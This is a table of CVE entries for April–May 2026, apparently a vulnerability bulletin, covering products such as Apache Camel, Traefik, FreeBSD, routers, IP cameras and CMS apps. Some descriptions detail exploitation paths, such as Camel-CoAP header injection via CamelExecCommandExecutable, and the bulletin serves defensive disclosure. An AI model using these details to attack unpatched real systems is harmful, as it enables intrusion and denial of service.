| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212. | 2026-04-29 | not yet calculated | CVE-2026-25852 | SEC-7217 |
| arc53--DocsGPT | DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0. | 2026-04-29 | not yet calculated | CVE-2026-26015 | https://github.com/arc53/DocsGPT/security/advisories/GHSA-gcrq-f296-2j74 https://github.com/arc53/DocsGPT/releases/tag/0.16.0 |
| aver[.]com-- web mgt interface v0.1.0000.65 | A Command Injection vulnerability in the web management interface in Aver PTC320UV2 0.1.0000.65 allows an unauthenticated attacker to execute arbitrary commands via a crafted web request. | 2026-05-01 | not yet calculated | CVE-2026-26461 | https://www.aver.com/Downloads/search?q=PTC320UV2 https://github.com/spaceraccoon/disclosures/blob/main/2026/CVE-2026-26461.md |
| Apache Software Foundation--Apache Camel | The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1. | 2026-04-27 | not yet calculated | CVE-2026-27172 | https://camel.apache.org/security/CVE-2026-27172.html |
| Netskope--Client | Netskope was notified about a potential gap in the Endpoint DLP Module for Netskope Client on Windows systems. The successful exploitation of the gap can potentially allow an unprivileged user to trigger an out-of-bounds read within a driver, leading to a Blue-Screen-of-Death (BSOD). Successful exploitation would require the Endpoint DLP module to be enabled in the client configuration. A successful exploit can potentially result in a denial-of-service for the local machine. | 2026-04-29 | not yet calculated | CVE-2026-2810 | https://www.netskope.com/resources/netskope-resources/netskope-security-advisory-nskpsa-2026-002 https://support.netskope.com/s/article/Netskope-Security-Advisory-NSKPSA-2026-002-Netskope-Endpoint-DLP-Driver-Security-Advisory |
| elixir-plug--plug_cowboy | Allocation of Resources Without Limits or Throttling vulnerability in elixir-plug plug_cowboy allows unauthenticated remote denial of service via atom table exhaustion. Plug.Cowboy.Conn.conn/1 in lib/plug/cowboy/conn.ex calls String.to_atom/1 on the value returned by :cowboy_req.scheme/1. For HTTP/2 connections, cowlib passes the client-supplied :scheme pseudo-header value through verbatim without validation. Each unique value permanently allocates a new entry in the BEAM atom table. Since atoms are never garbage-collected and the atom table has a fixed limit (default 1,048,576), an unauthenticated attacker can exhaust the table by sending HTTP/2 requests with unique :scheme values, causing the Erlang VM to abort with system_limit and taking down the entire node. This vulnerability does not affect HTTP/1.1, where cowboy derives the scheme from the listener type rather than from a client-supplied header. This issue affects plug_cowboy: from 2.0.0 before 2.8.1. | 2026-04-27 | not yet calculated | CVE-2026-32688 | https://github.com/elixir-plug/plug_cowboy/security/advisories/GHSA-q8x4-x7mp-5vg2 https://cna.erlef.org/cves/CVE-2026-32688.html https://osv.dev/vulnerability/EEF-CVE-2026-32688 https://github.com/elixir-plug/plug_cowboy/commit/bfb34cb45eb354e56437f7023fb306de1bf9c19b |
| CRM Sistemas de Fidelizacin--MegaCMS | SQL injection (SQLi) in MegaCMS v12.0.0, specifically in the "id_territorio" parameter of the "/web_comunications/cms/get_provincias" endpoint. The vulnerability arises from inadequate validation and sanitisation of user input. Specifically, via a POST request, the "id_territorio" parameter, used immediately after the registration form is submitted, could be manipulated by an unauthenticated attacker to execute arbitrary SQL queries. | 2026-04-29 | not yet calculated | CVE-2026-3325 | https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-megacms-crm-sistemas-de-fidelizacion |
| Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--LogonTracer | An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrary OS command may be executed by a logged-in user. | 2026-04-27 | not yet calculated | CVE-2026-33277 | https://www.jpcert.or.jp/press/2026/PR20260423.html https://jvn.jp/en/jp/JVN57877356/ |
| Absolute Software--Secure Access | CVE-2026-33446 is a buffer overflow in the authentication sub-system of the Secure Access client prior to 14.50. Attackers with control of a modified server can send a special packet that can overwrite a small portion of memory conceivably leading to memory corruption or a denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33446 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33446 |
| Absolute Software--Secure Access | CVE-2026-33447 is a buffer overflow in a message parsing function of the Secure Access client prior to 14.50. Attackers with control of a modified server can send a special packet that can overwrite a small portion of memory conceivably leading to memory corruption or denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33447 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33447 |
| Absolute Software--Secure Access | CVE-2026-33448 is a format string vulnerability in the logging subsystem of Secure Access client for MacOS prior to 14.50. Attackers with control of a modified server can force the client to dump the contents of a small portion of memory to the log files potentially revealing secrets. | 2026-04-30 | not yet calculated | CVE-2026-33448 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33448 |
| Absolute Software--Secure Access | CVE-2026-33449 is a buffer overflow in a message handling function of the Secure Access client prior to 14.50. Attackers with control of a modified server can send a cryptographically valid message to the client, overwriting a small portion of memory conceivably leading to a denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33449 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33449 |
| Absolute Software--Secure Access | CVE-2026-33450 is an out of bounds read vulnerability in the Secure Access MacOS client prior to 14.50. Attackers with control of a modified server can send a malformed packet to the client causing a denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33450 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33450 |
| Absolute Software--Secure Access | CVE-2026-33451 is an arbitrary read/write vulnerability in the Secure Access Windows client prior to 14.50. Attackers with local control of the Windows client can send malformed data to an API and elevate their level of privilege to system. | 2026-04-30 | not yet calculated | CVE-2026-33451 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33451 |
| Absolute Software--Secure Access | CVE-2026-33452 is a buffer overflow vulnerability in the Secure Access Windows client prior to 14.50. Attackers with local control of the Windows client can use it to 'blue screen' the system. | 2026-04-30 | not yet calculated | CVE-2026-33452 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33452 |
| Apache Software Foundation--Apache Camel | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec) The camel-coap component maps incoming CoAP request URI query parameters directly into Camel Exchange In message headers without applying any HeaderFilterStrategy. Specifically, CamelCoapResource.handleRequest() iterates over OptionSet.getUriQuery() and calls camelExchange.getIn().setHeader(...) for every query parameter. CoAPEndpoint extends DefaultEndpoint rather than DefaultHeaderFilterStrategyEndpoint, and CoAPComponent does not implement HeaderFilterStrategyComponent; the component contains no references to HeaderFilterStrategy at all. As a result, an unauthenticated attacker who can send a single CoAP UDP packet to a Camel route consuming from coap:// can inject arbitrary Camel internal headers (those prefixed with Camel*) into the Exchange. When the route delivers the message to a header-sensitive producer such as camel-exec, camel-sql, camel-bean, camel-file, or template components (camel-freemarker, camel-velocity), the injected headers can alter the producer's behavior. In the case of camel-exec, the CamelExecCommandExecutable and CamelExecCommandArgs headers override the executable and arguments configured on the endpoint, resulting in arbitrary OS command execution under the privileges of the Camel process. The producer's output is written back to the Exchange body and returned in the CoAP response payload by CamelCoapResource, giving the attacker an interactive RCE channel without any need for out-of-band exfiltration. Exploitation prerequisites are minimal: a single unauthenticated UDP datagram to the CoAP port (default 5683). CoAP (RFC 7252) has no built-in authentication, and DTLS is optional and disabled by default. Because the protocol is UDP-based, HTTP-layer WAF/IDS controls do not apply. This issue affects Apache Camel: from 4.14.0 through 4.14.5, from 4.18.0 before 4.18.1, 4.19.0. Users are recommended to upgrade to version 4.18.1 or 4.19.0, fixing the issue. | 2026-04-27 | not yet calculated | CVE-2026-33453 | https://camel.apache.org/security/CVE-2026-33453.html |
| Apache Software Foundation--Apache Camel | The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. | 2026-04-27 | not yet calculated | CVE-2026-33454 | https://camel.apache.org/security/CVE-2026-33454.html |
| Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--LogonTracer | There is a cypher injection issue in LogonTracer prior to v2.0.0. If specially crafted Windows event log data is loaded, the contents of the database may be altered. | 2026-04-27 | not yet calculated | CVE-2026-33566 | https://www.jpcert.or.jp/press/2026/PR20260423.html https://jvn.jp/en/jp/JVN57877356/ |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Prior to versions 2.11.43, 3.6.14, and 3.7.0-rc.2, there is an authentication bypass vulnerability in Traefik's ForwardAuth middleware when trustForwardHeader=false is configured and Traefik is deployed behind a trusted upstream proxy. This issue has been patched in versions 2.11.43, 3.6.14, and 3.7.0-rc.2. | 2026-04-30 | not yet calculated | CVE-2026-35051 | https://github.com/traefik/traefik/security/advisories/GHSA-6384-m2mw-rf54 https://github.com/traefik/traefik/releases/tag/v2.11.43 https://github.com/traefik/traefik/releases/tag/v3.6.14 https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2 |
| FreeBSD--FreeBSD | When processing the header of an incoming message, libnv failed to properly validate the message size. The lack of validation allows a malicious program to write outside the bounds of a heap allocation. This can trigger a crash or system panic, and it may be possible for an unprivileged user to exploit the bug to elevate their privileges. | 2026-04-30 | not yet calculated | CVE-2026-35547 | https://security.freebsd.org/advisories/FreeBSD-SA-26:17.libnv.asc |
| merkurysmart[.]com-- MIPC252W v1.0.5 | A handling issue in the RTSP service of the Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n allows an authenticated attacker to trigger session termination by repeatedly sending SETUP requests for the same media track within a single RTSP session. This causes the server to reset the RTSP connection, leading to a denial-of-service condition. | 2026-04-27 | not yet calculated | CVE-2026-35901 | https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_2th/README.md |
| merkurysmart[.]com-- MIPC252W v1.0.5 | The RTSP service of MERCURY IP camera MIPC252W 1.0.5 Build 230306 has an issue handling failed Digest authentication attempts. By repeatedly sending RTSP requests with invalid authentication parameters, an unauthenticated attacker can cause the RTSP service to enter a persistent authentication failure state, preventing legitimate clients from authenticating and leading to a denial of service. | 2026-04-27 | not yet calculated | CVE-2026-35902 | https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md |
| merkurysmart[.]com-- MIPC252W v1.0.5 | MERCURY MIPC252W IP camera 1.0.5 Build 230306 Rel.79931n contains an improper authentication vulnerability in the RTSP service. After successful Digest authentication in an initial DESCRIBE request, the device does not verify the Digest response parameter in subsequent RTSP requests within the same session. As a result, RTSP methods such as SETUP, PLAY, and TEARDOWN can be processed even when the Authorization header contains an empty or invalid response value, as long as the nonce and session identifier correspond to a previously authenticated session. This allows an attacker with network access to reuse session parameters and issue unauthorized RTSP control commands without computing a valid Digest response. | 2026-04-27 | not yet calculated | CVE-2026-35903 | https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_4th/README.md |
| n/a--Krayin CRM v.2.1.5 | An issue in Krayin CRM v.2.1.5 and fixed in v.2.1.6 allows a remote attacker to execute arbitrary code via the compose email function | 2026-04-30 | not yet calculated | CVE-2026-36340 | https://drive.google.com/file/d/1yBdvbrXGf9fsFckmK9zTe2v8_vDtdicH/view https://github.com/krayin/laravel-crm/releases/tag/v2.1.6 https://github.com/cybercrewinc/CVE-2026-36340 |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /plugins/-/install-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36756 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf2/readme.md |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /plugins/{name}/upgrade-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36757 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf1/readme.md |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /themes/-/install-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36758 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf3/readme.md |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /themes/{name}/upgrade-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36759 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf4/readme.md |
| n/a--JeeSite v5.15.1 | An issue in the fileMd5 parameter in the /a/file/upload endpoint of JeeSite v5.15.1 allows authenticated attackers with file upload permissions to execute a path traversal and write arbitrary files with whitelisted suffixes to arbitrary filesystem locations while chunked upload is enabled. | 2026-04-30 | not yet calculated | CVE-2026-36760 | https://github.com/thinkgem/jeesite https://github.com/thinkgem/jeesite/issues/530 |
| n/a--JeeSite v5.15.1 | A stored cross-site scripting (XSS) vulnerability in the /msg/msgInner/save endpoint of JeeSite v5.15.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted input into the msgContent parameter. | 2026-04-30 | not yet calculated | CVE-2026-36761 | https://github.com/thinkgem/jeesite https://github.com/thinkgem/jeesite/issues/528 |
| n/a--JeeSite v5.15.1 | An issue in the fileEntityId parameter in the /a/file/upload endpoint of JeeSite v5.15.1 allows authenticated attackers with file upload permissions to execute a path traversal and write arbitrary files with whitelisted suffixes to arbitrary filesystem locations. | 2026-04-30 | not yet calculated | CVE-2026-36762 | https://github.com/thinkgem/jeesite https://github.com/thinkgem/jeesite/issues/529 |
| n/a--SpringBlade v4.8.0 | A stored cross-site scripting (XSS) vulnerability in the /api/blade-desk/notice/submit endpoint of SpringBlade v4.8.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted input into the content parameter. | 2026-04-30 | not yet calculated | CVE-2026-36763 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/38 https://github.com/shopizer-ecommerce/shopizer/issues/1091 |
| n/a--SpringBlade v4.8.0 | A Server-Side Request Forgery (SSRF) in the /ureport/datasource/testConnection endpoint of SpringBlade v4.8.0 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36764 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/36 |
| n/a--SpringBlade v4.8.0 | An XML external entity (XXE) vulnerability in the /designer/loadReport endpoint of SpringBlade v4.8.0 allows authenticated attackers to execute arbitrary code via injecting a crafted payload. | 2026-04-30 | not yet calculated | CVE-2026-36765 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/37 |
| n/a--shopizer v3.2.5 | Multiple authenticated cross-site scripting (XSS) vulnerabilities in the XssHttpServletRequestWrapper class of shopizer v3.2.5 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the getInputStream() or getReader() functions. | 2026-04-30 | not yet calculated | CVE-2026-36766 | https://github.com/shopizer-ecommerce/shopizer https://github.com/shopizer-ecommerce/shopizer/issues/1093 |
| n/a--shopizer v3.2.5 | A path traversal vulnerability in the /content/images/add endpoint of shopizer v3.2.5 allows attackers write arbitrary files to any writeable path via a crafted POST request. | 2026-04-30 | not yet calculated | CVE-2026-36767 | https://github.com/shopizer-ecommerce/shopizer https://github.com/shopizer-ecommerce/shopizer/issues/1091 |
| Totolink[.]net -- TOTOLINK A3002RU v3 | TOTOLINK A3002RU V3 <= V3.0.0-B20220304.1804 was discovered to contain a stack-based buffer overflow via the hostname parameter in the formMapDelDevice function. | 2026-04-29 | not yet calculated | CVE-2026-36837 | https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RUV3.0-boa-formMapDelDevice-StackOverflow |
| Totolink[.]net -- TOTOLINK N200RE v5 | TOTOLINK N200RE V5 was discovered to contain a command injection vulnerability via the macstr and bandstr parameters in the formMapDelDevice function. | 2026-04-29 | not yet calculated | CVE-2026-36841 | https://github.com/0xmania/cve/tree/main/TOTOLINK-N200RE_V5-cstecgi-formMapDelDevice-CommandInjection |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the Dbit N300 T1 Pro wireless router V1.0.0. The router fails to implement proper CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints such as /api/setWlan. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action. | 2026-04-30 | not yet calculated | CVE-2026-36956 | http://dbit.com https://github.com/kirubel-cve/CVE-2026-36956 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router V1.0.0 is vulnerable to Denial of Service via the boa web server URI handler. By initiating a high-volume flood of HTTP GET requests to non-existent URIs, an attacker can exhaust critical system resources, including file descriptors and memory buffers. This results in a kernel deadlock or system hang that disables the web management portal and all routing capabilities. | 2026-04-30 | not yet calculated | CVE-2026-36957 | http://dbit.com https://github.com/kirubel-cve/CVE-2026-36957 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | A denial-of-service vulnerability exists in the U-SPEED N300 V1.0.0 wireless router. By sending a large number of concurrent HTTP requests to random or non-existent endpoints on the web management interface, an attacker can exhaust system resources in the embedded Boa HTTP server. This causes the router web interface to become unresponsive and may require manual reboot to restore normal operation. | 2026-04-30 | not yet calculated | CVE-2026-36958 | http://u-speed.com https://github.com/kirubel-cve/CVE-2026-36958 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | U-SPEED N300 router V1.0.0 does not implement rate limiting or account lockout protections on the /api/login endpoint. This allows an attacker on the local network to perform unlimited authentication attempts, enabling brute-force attacks against the administrator account and potential unauthorized access to the router management interface. | 2026-04-30 | not yet calculated | CVE-2026-36959 | http://u-speed.com https://github.com/kirubel-cve/CVE-2026-36959 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the U-SPEED N300 Rounter V1.0.0. The device does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action. | 2026-04-30 | not yet calculated | CVE-2026-36960 | http://u-speed.com https://github.com/kirubel-cve/CVE-2026-36960 |
| n/a--FlowSpec operator array | An off-by-one out-of-bounds write vulnerability in the bgp_flowspec_op_decode() function (bgpd/bgp_flowspec_util.c) of FRRouting (FRR) stable/10.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted FlowSpec component. | 2026-05-01 | not yet calculated | CVE-2026-37457 | https://github.com/FRRouting/frr/commit/0e6882bc72c0278988a47b2f0f73b7a91099a25c |
| n/a--Automotive Grade Linux (AGL) | AGL agl-service-can-low-level thru 17.1.12 contains a stack buffer overflow in the uds-c library. The send_diagnostic_request function in uds.c allocates a 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) but copies up to 7 bytes (MAX_UDS_REQUEST_PAYLOAD_LENGTH=7) via memcpy at an offset of 1+pid_length (2-3 bytes), resulting in 1-4 bytes of controlled stack overflow. The payload_length field (uint8_t) has no bounds check against the destination buffer. On 32-bit ARM automotive ECUs without stack canaries, this can lead to return address overwrite and RCE. | 2026-05-01 | not yet calculated | CVE-2026-37530 | https://gerrit.automotivelinux.org/gerrit/apps/agl-service-can-low-level https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Open SAE J1939 protocol CAN-Bus) | Integer underflow vulnerability in Open-SAE-J1939 thru commit b6caf884df46435e539b1ecbf92b6c29b345bdfe (2025-11-30) in SAE_J1939_Read_Transport_Protocol_Data_Transfer,allows attackers to write to arbitrary memory via crafted sequence number from the CAN frame. | 2026-05-01 | not yet calculated | CVE-2026-37534 | https://github.com/DanielMartensson/Open-SAE-J1939 https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--socketcand 0.4.2 | Buffer overflow vulnerability in socketcand 0.4.2 in file socketcand.c in function main allows attackers to cause a denial of service or other unspecified impacts via crafted bus_name. | 2026-05-01 | not yet calculated | CVE-2026-37538 | https://github.com/dschanoeh/socketcand https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--libsndfile 1.2.2 | An issue was discovered in libsndfile 1.2.2 IMA ADPCM codec. The AIFF code path (line 241) was fixed with (sf_count_t) cast, but the WAV code path (line 235) and close path (line 167) were not. When samplesperblock (int) * blocks (int) exceeds INT_MAX, the 32-bit multiplication overflows before being assigned to sf.frames (sf_count_t/int64). With samplesperblock=50000 and blocks=50000, the product 2500000000 overflows to -1794967296. This causes incorrect frame count leading to heap buffer overflow or denial of service. Both values come from the WAV file header and are attacker-controlled. This issue was discovered after an incomplete fix for CVE-2022-33065. | 2026-04-29 | not yet calculated | CVE-2026-37555 | https://github.com/libsndfile/libsndfile/issues/833 https://github.com/libsndfile/libsndfile/commit/9a829113c88a51e57c1e46473e90609e4b7df151 https://gist.github.com/sgInnora/a5f5c19e4bf6f4fb74fab7b0ef2bfcc1 |
| n/a--School Management System | A reflected Cross-Site Scripting (XSS) vulnerability in School Management System by mahmoudai1 allows unauthenticated remote attackers to execute arbitrary JavaScript in victim's browsers via the unsanitized type parameter in register.php. | 2026-04-28 | not yet calculated | CVE-2026-37750 | https://github.com/mahmoudai1/school-management-system https://github.com/mahmoudai1/school-management-system/blob/main/register.php https://github.com/menevarad007/CVE-2026-37750 |
| n/a--Netmaker v1.5.0 | Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information | 2026-04-28 | not yet calculated | CVE-2026-38651 | https://github.com/gravitl/netmaker/commit/5309aa70d464ef565911369714d661a61481a79b https://www.zyenra.com/blog/netmaker-jwt-verification-bypass https://www.zyenra.com/advisories/netmaker-jwt-verification-bypass |
| Moxa--EDR-8010 Series | An improper ownership management vulnerability has been identified in Moxa's Secure Router. Because of improper ownership management, a low-privileged authenticated user may access a configuration file containing the hashed password of the administrative account. Successful exploitation of this vulnerability could allow an attacker to obtain sensitive information. Exploitation is only possible under a specific condition - when the configuration file has been exported. This vulnerability does not impact the integrity or availability of the affected product, and no confidentiality, integrity, or availability impact to the subsequent system has been identified. | 2026-04-27 | not yet calculated | CVE-2026-3867 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-261521-cve-2026-3867-cve-2026-3868-improper-ownership-management-and-improper-handling-of-length-parameter-incons |
| Moxa--EDR-8010 Series | An improper handling of the length parameter inconsistency vulnerability has been identified in Moxa's Secure Router. Because of improper validation of length parameters in the HTTPS management interface, an unauthenticated remote attacker could send specially crafted requests that trigger a buffer overflow condition, causing the web service to become unresponsive. Successful exploitation may result in a denial-of-service condition requiring a device reboot to restore normal operation. While successful exploitation can severely impact the availability of the affected device, no impact to the confidentiality or integrity of the affected product has been identified. Additionally, no confidentiality, integrity, or availability impact to the subsequent system has been identified. | 2026-04-27 | not yet calculated | CVE-2026-3868 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-261521-cve-2026-3867-cve-2026-3868-improper-ownership-management-and-improper-handling-of-length-parameter-incons |
| n/a--diskoverdata v.2.3.5 | Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php | 2026-04-27 | not yet calculated | CVE-2026-38934 | http://diskover-community.com http://diskoverdata.com https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38934 |
| n/a--diskoverdata v.2.3.5 | A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter | 2026-04-27 | not yet calculated | CVE-2026-38935 | http://diskover-community.com http://diskoverdata.com https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38935 |
| n/a--diskoverdata v.2.3.5 | A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter | 2026-04-27 | not yet calculated | CVE-2026-38936 | http://diskover-community.com http://diskoverdata.com https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38936 |
| n/a--mvc-ecommerce v.1.0 | Cross Site Scripting vulnerability in andrewtch88 mvc-ecommerce v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the product_catalogue.php component | 2026-04-30 | not yet calculated | CVE-2026-38939 | https://gist.github.com/spico8/3b8b64a58069fc189ca28563dd1249e8 |
| n/a--TOKO-ONLINE-ROTI v.1.0 | Cross Site Scripting vulnerability in RafyMrX TOKO-ONLINE-ROTI v.1.0 allows a remote attacker to execute arbitrary code via the detail_produk.php component | 2026-04-30 | not yet calculated | CVE-2026-38940 | https://gist.github.com/spico8/3b8b64a58069fc189ca28563dd1249e8 |
| n/a--FUEL CMS v1.5.2 | Cross-Site Scripting (XSS) vulnerability exists in FUEL CMS v1.5.2 and before within the asset upload functionality. The application fails to properly sanitize uploaded SVG files, allowing a low-privileged authenticated user to upload a crafted SVG file containing malicious code. | 2026-04-28 | not yet calculated | CVE-2026-38948 | https://github.com/daylightstudio/FUEL-CMS https://www.youtube.com/watch?v=lLCF0xbjecQ https://github.com/Chittu13/cve-research/blob/main/CVE-2026-38948/README.md |
| n/a--HTMLy v3.1.1 | Cross-Site Scripting (XSS) vulnerability exists in HTMLy version 3.1.1 in the content creation functionality at the /add/content?type=image endpoint. The application fails to properly sanitize user input, allowing injection of arbitrary code | 2026-04-28 | not yet calculated | CVE-2026-38949 | https://github.com/danpros/htmly https://youtu.be/3e-tzUMCox8 https://github.com/Chittu13/cve-research/blob/main/CVE-2026-38949/README.md |
| n/a--Cockpit v2.13.5 | Cockpit 2.13.5 and earlier is affected by a misconfiguration within the Bucket component _isFileTypeAllowed function where a specially crafted filename bypasses an extension filter. This allows an authenticated attacker to rename arbitrary files with the .php file extension enabling arbitrary code to be executed on the underlying server. | 2026-04-29 | not yet calculated | CVE-2026-38991 | https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0 https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/ |
| n/a--Cockpit v2.13.5 | Cockpit v2.13.5 and earlier is vulnerable to arbitrary code execution via the filter parameter within multiple endpoints. This vulnerability allows an attacker to run system commands on the underlying infrastructure via the MongoLite $func operator. | 2026-04-29 | not yet calculated | CVE-2026-38992 | https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0 https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/ |
| n/a--Cockpit v2.13.5 | Cockpit 2.13.5 and earlier is vulnerable to directory traversal via the Buckets component. This vulnerability allows authenticated attackers to write files to arbitrary locations within the uploads directory or overwrite assets with malicious versions. | 2026-04-29 | not yet calculated | CVE-2026-38993 | https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0 https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/ |
